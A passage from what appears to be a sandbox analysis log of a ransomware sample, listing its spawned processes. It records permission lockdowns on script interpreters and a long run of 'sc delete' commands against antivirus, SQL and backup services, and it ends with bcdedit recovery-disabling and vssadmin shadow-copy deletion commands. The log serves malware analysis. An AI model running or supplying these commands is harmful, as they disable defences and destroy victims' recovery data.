3⤵
PID:3956

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d "network service"
3⤵
PID:5088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1784

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d system
3⤵
PID:4620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:660

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:384

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\wscript.exe /a
3⤵
- Modifies file permissions
PID:2196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:920

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
3⤵
PID:352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:860

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
3⤵
PID:1876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4396

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
3⤵
PID:4840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3848

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
3⤵
PID:3360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3356

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
3⤵
PID:3608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
3⤵
PID:4852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3196

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d system
3⤵
PID:1524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3464

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:1412

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3628

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /g Administrators:f
3⤵
PID:4004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:280

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Users:r
3⤵
PID:4508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5096

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
3⤵
PID:4820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4864

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d SERVICE
3⤵
PID:5008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4644

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
3⤵
PID:4780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4788

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d "network service"
3⤵
PID:3732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:648

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d system
3⤵
PID:4816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3444

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:4576

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cscript.exe /a
3⤵
- Modifies file permissions
PID:2360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1312

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
3⤵
PID:4768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2664

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
3⤵
PID:2644

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
3⤵
PID:1432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
3⤵
PID:3364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2844

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
3⤵
PID:3336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2224

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
3⤵
PID:4252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d system
3⤵
PID:3560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4492

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:4892

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5116

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:1556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:2864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4736

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:4248

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4368

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2184

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:4424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1280

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2452

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:1684

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:4900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:252

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:2932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:3376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2692

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4952

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:2104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4300

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:3504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3420

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:4912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:3308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4892

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:4924

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\ProgramData /a
3⤵
- Modifies file permissions
PID:4232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1556

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /g Administrators:f
3⤵
PID:1008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2864

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Users:r
3⤵
PID:3816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3596

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Administrators:r
3⤵
PID:4436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2736

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d SERVICE
3⤵
PID:4464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:204

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssqlserver
3⤵
PID:4620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2184

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d "network service"
3⤵
PID:4764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2196

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d system
3⤵
PID:308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2452

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssql$sqlexpress
3⤵
PID:352

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Users\Public /a
3⤵
- Modifies file permissions
PID:1824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1332

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /g Administrators:f
3⤵
PID:2688

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Users:r
3⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4296

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Administrators:r
3⤵
PID:1384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3612

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d SERVICE
3⤵
PID:2844

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssqlserver
3⤵
PID:4948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4072

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d "network service"
3⤵
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5084

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d system
3⤵
PID:756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssql$sqlexpress
3⤵
PID:3992

C:\Windows\SysWOW64\sc.exe
sc delete "vmickvpexchange"
3⤵
- Launches sc.exe
PID:4508

C:\Windows\SysWOW64\sc.exe
sc delete "vmicguestinterface"
3⤵
- Launches sc.exe
PID:4044

C:\Windows\SysWOW64\sc.exe
sc delete "vmicshutdown"
3⤵
- Launches sc.exe
PID:5012

C:\Windows\SysWOW64\sc.exe
sc delete "vmicheartbeat"
3⤵
PID:3524

C:\Windows\SysWOW64\sc.exe
sc delete "vmicrdv"
3⤵
- Launches sc.exe
PID:4736

C:\Windows\SysWOW64\sc.exe
sc delete "storflt"
3⤵
- Launches sc.exe
PID:5088

C:\Windows\SysWOW64\sc.exe
sc delete "vmictimesync"
3⤵
- Launches sc.exe
PID:4248

C:\Windows\SysWOW64\sc.exe
sc delete "vmicvss"
3⤵
- Launches sc.exe
PID:4596

C:\Windows\SysWOW64\sc.exe
sc delete "hvdsvc"
3⤵
PID:324

C:\Windows\SysWOW64\sc.exe
sc delete "nvspwmi"
3⤵
- Launches sc.exe
PID:3304

C:\Windows\SysWOW64\sc.exe
sc delete "wmms"
3⤵
- Launches sc.exe
PID:2428

C:\Windows\SysWOW64\sc.exe
sc delete "AvgAdminServer"
3⤵
PID:3168

C:\Windows\SysWOW64\sc.exe
sc delete "AVG Antivirus"
3⤵
PID:2392

C:\Windows\SysWOW64\sc.exe
sc delete "avgAdminClient"
3⤵
- Launches sc.exe
PID:2196

C:\Windows\SysWOW64\sc.exe
sc delete "SAVService"
3⤵
- Launches sc.exe
PID:2204

C:\Windows\SysWOW64\sc.exe
sc delete "SAVAdminService"
3⤵
PID:1928

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos AutoUpdate Service"
3⤵
- Launches sc.exe
PID:4840

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Clean Service"
3⤵
PID:1824

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Device Control Service"
3⤵
- Launches sc.exe
PID:2176

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
- Launches sc.exe
PID:2516

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos File Scanner Service"
3⤵
- Launches sc.exe
PID:2016

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Health Service"
3⤵
PID:3180

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Agent"
3⤵
- Launches sc.exe
PID:2692

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Client"
3⤵
- Launches sc.exe
PID:3196

C:\Windows\SysWOW64\sc.exe
sc delete "SntpService"
3⤵
- Launches sc.exe
PID:2224

C:\Windows\SysWOW64\sc.exe
sc delete "swc_service"
3⤵
PID:2792

C:\Windows\SysWOW64\sc.exe
sc delete "swi_service"
3⤵
PID:4948

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos UI"
3⤵
- Launches sc.exe
PID:4656

C:\Windows\SysWOW64\sc.exe
sc delete "swi_update"
3⤵
PID:272

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Web Control Service"
3⤵
PID:4544

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos System Protection Service"
3⤵
PID:4016

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Safestore Service"
3⤵
PID:5108

C:\Windows\SysWOW64\sc.exe
sc delete "hmpalertsvc"
3⤵
- Launches sc.exe
PID:4488

C:\Windows\SysWOW64\sc.exe
sc delete "RpcEptMapper"
3⤵
PID:3960

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
PID:4728

C:\Windows\SysWOW64\sc.exe
sc delete "SophosFIM"
3⤵
- Launches sc.exe
PID:4428

C:\Windows\SysWOW64\sc.exe
sc delete "swi_filter"
3⤵
PID:4696

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdGuardianDefaultInstance"
3⤵
PID:4704

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdServerDefaultInstance"
3⤵
- Launches sc.exe
PID:408

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
3⤵
PID:644

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLSERVER"
3⤵
PID:4372

C:\Windows\SysWOW64\sc.exe
sc delete "SQLSERVERAGENT"
3⤵
PID:4424

C:\Windows\SysWOW64\sc.exe
sc delete "SQLBrowser"
3⤵
- Launches sc.exe
PID:1508

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY"
3⤵
PID:3400

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer130"
3⤵
- Launches sc.exe
PID:1280

C:\Windows\SysWOW64\sc.exe
sc delete "SSISTELEMETRY130"
3⤵
PID:2684

C:\Windows\SysWOW64\sc.exe
sc delete "SQLWriter"
3⤵
PID:1812

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$VEEAMSQL2012"
3⤵
PID:304

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$VEEAMSQL2012"
3⤵
PID:3864

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL"
3⤵
- Launches sc.exe
PID:3848

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent"
3⤵
PID:2688

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerADHelper100"
3⤵
- Launches sc.exe
PID:4344

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerOLAPService"
3⤵
- Launches sc.exe
PID:4960

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer100"
3⤵
PID:4336

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer"
3⤵
- Launches sc.exe
PID:4504

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY$HL"
3⤵
PID:4260

C:\Windows\SysWOW64\sc.exe
sc delete "TMBMServer"
3⤵
PID:4920

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$PROGID"
3⤵
PID:4940

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$WOLTERSKLUWER"
3⤵
- Launches sc.exe
PID:4160

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$PROGID"
3⤵
PID:4980

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$WOLTERSKLUWER"
3⤵
PID:760

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher$OPTIMA"
3⤵
PID:68

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$OPTIMA"
3⤵
- Launches sc.exe
PID:1584

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$OPTIMA"
3⤵
- Launches sc.exe
PID:4232

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer$OPTIMA"
3⤵
- Launches sc.exe
PID:3284

C:\Windows\SysWOW64\sc.exe
sc delete "msftesql$SQLEXPRESS"
3⤵
- Launches sc.exe
PID:1008

C:\Windows\SysWOW64\sc.exe
sc delete "postgresql-x64-9.4"
3⤵
- Launches sc.exe
PID:2884

C:\Windows\SysWOW64\sc.exe
sc delete "WRSVC"
3⤵
- Launches sc.exe
PID:5112

C:\Windows\SysWOW64\sc.exe
sc delete "ekrn"
3⤵
- Launches sc.exe
PID:4392

C:\Windows\SysWOW64\sc.exe
sc delete "ekrnEpsw"
3⤵
- Launches sc.exe
PID:4808

C:\Windows\SysWOW64\sc.exe
sc delete "klim6"
3⤵
- Launches sc.exe
PID:4404

C:\Windows\SysWOW64\sc.exe
sc delete "AVP18.0.0"
3⤵
- Launches sc.exe
PID:4376

C:\Windows\SysWOW64\sc.exe
sc delete "KLIF"
3⤵
PID:4400

C:\Windows\SysWOW64\sc.exe
sc delete "klpd"
3⤵
- Launches sc.exe
PID:3444

C:\Windows\SysWOW64\sc.exe
sc delete "klflt"
3⤵
PID:3220

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupdisk"
3⤵
- Launches sc.exe
PID:3492

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupflt"
3⤵
- Launches sc.exe
PID:4240

C:\Windows\SysWOW64\sc.exe
sc delete "klkbdflt"
3⤵
- Launches sc.exe
PID:2036

C:\Windows\SysWOW64\sc.exe
sc delete "klmouflt"
3⤵
- Launches sc.exe
PID:2928

C:\Windows\SysWOW64\sc.exe
sc delete "klhk"
3⤵
PID:4220

C:\Windows\SysWOW64\sc.exe
sc delete "KSDE1.0.0"
3⤵
PID:1796

C:\Windows\SysWOW64\sc.exe
sc delete "kltap"
3⤵
- Launches sc.exe
PID:3360

C:\Windows\SysWOW64\sc.exe
sc delete "ScSecSvc"
3⤵
PID:3752

C:\Windows\SysWOW64\sc.exe
sc delete "Core Mail Protection"
3⤵
- Launches sc.exe
PID:1980

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning Server"
3⤵
- Launches sc.exe
PID:1944

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning ServerEx"
3⤵
- Launches sc.exe
PID:4880

C:\Windows\SysWOW64\sc.exe
sc delete "Online Protection System"
3⤵
- Launches sc.exe
PID:4952

C:\Windows\SysWOW64\sc.exe
sc delete "RepairService"
3⤵
PID:3996

C:\Windows\SysWOW64\sc.exe
sc delete "Core Browsing Protection"
3⤵
PID:4476

C:\Windows\SysWOW64\sc.exe
sc delete "Quick Update Service"
3⤵
- Launches sc.exe
PID:2640

C:\Windows\SysWOW64\sc.exe
sc delete "McAfeeFramework"
3⤵
PID:3980

C:\Windows\SysWOW64\sc.exe
sc delete "macmnsvc"
3⤵
- Launches sc.exe
PID:4024

C:\Windows\SysWOW64\sc.exe
sc delete "masvc"
3⤵
PID:5020

C:\Windows\SysWOW64\sc.exe
sc delete "mfemms"
3⤵
PID:2612

C:\Windows\SysWOW64\sc.exe
sc delete "mfevtp"
3⤵
PID:5096

C:\Windows\SysWOW64\sc.exe
sc delete "TmFilter"
3⤵
- Launches sc.exe
PID:4820

C:\Windows\SysWOW64\sc.exe
sc delete "TMLWCSService"
3⤵
PID:3912

C:\Windows\SysWOW64\sc.exe
sc delete "tmusa"
3⤵
PID:5076

C:\Windows\SysWOW64\sc.exe
sc delete "TmPreFilter"
3⤵
- Launches sc.exe
PID:4580

C:\Windows\SysWOW64\sc.exe
sc delete "TMSmartRelayService"
3⤵
PID:4648

C:\Windows\SysWOW64\sc.exe
sc delete "TMiCRCScanService"
3⤵
PID:192

C:\Windows\SysWOW64\sc.exe
sc delete "VSApiNt"
3⤵
- Launches sc.exe
PID:2248

C:\Windows\SysWOW64\sc.exe
sc delete "TmCCSF"
3⤵
- Launches sc.exe
PID:204

C:\Windows\SysWOW64\sc.exe
sc delete "tmlisten"
3⤵
PID:2208

C:\Windows\SysWOW64\sc.exe
sc delete "TmProxy"
3⤵
- Launches sc.exe
PID:1580

C:\Windows\SysWOW64\sc.exe
sc delete "ntrtscan"
3⤵
- Launches sc.exe
PID:920

C:\Windows\SysWOW64\sc.exe
sc delete "ofcservice"
3⤵
- Launches sc.exe
PID:3316

C:\Windows\SysWOW64\sc.exe
sc delete "TmPfw"
3⤵
PID:1312

C:\Windows\SysWOW64\sc.exe
sc delete "PccNTUpd"
3⤵
- Launches sc.exe
PID:2616

C:\Windows\SysWOW64\sc.exe
sc delete "PandaAetherAgent"
3⤵
- Launches sc.exe
PID:2664

C:\Windows\SysWOW64\sc.exe
sc delete "PSUAService"
3⤵
- Launches sc.exe
PID:4692

C:\Windows\SysWOW64\sc.exe
sc delete "NanoServiceMain"
3⤵
PID:4612

C:\Windows\SysWOW64\sc.exe
sc delete "EPIntegrationService"
3⤵
- Launches sc.exe
PID:4688

C:\Windows\SysWOW64\sc.exe
sc delete "EPProtectedService"
3⤵
PID:4936

C:\Windows\SysWOW64\sc.exe
sc delete "EPRedline"
3⤵
PID:1204

C:\Windows\SysWOW64\sc.exe
sc delete "EPSecurityService"
3⤵
PID:1384

C:\Windows\SysWOW64\sc.exe
sc delete "EPUpdateService"
3⤵
- Launches sc.exe
PID:4896

C:\Windows\SysWOW64\sc.exe
sc delete "UniFi"
3⤵
- Launches sc.exe
PID:3260

C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
2⤵
PID:3212

C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
2⤵
PID:4984

C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:5036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
3⤵
PID:252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
3⤵
PID:208

C:\Windows\System32\vssadmin.exe
"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:760

C:\Windows\SysWOW64\cmd.exe
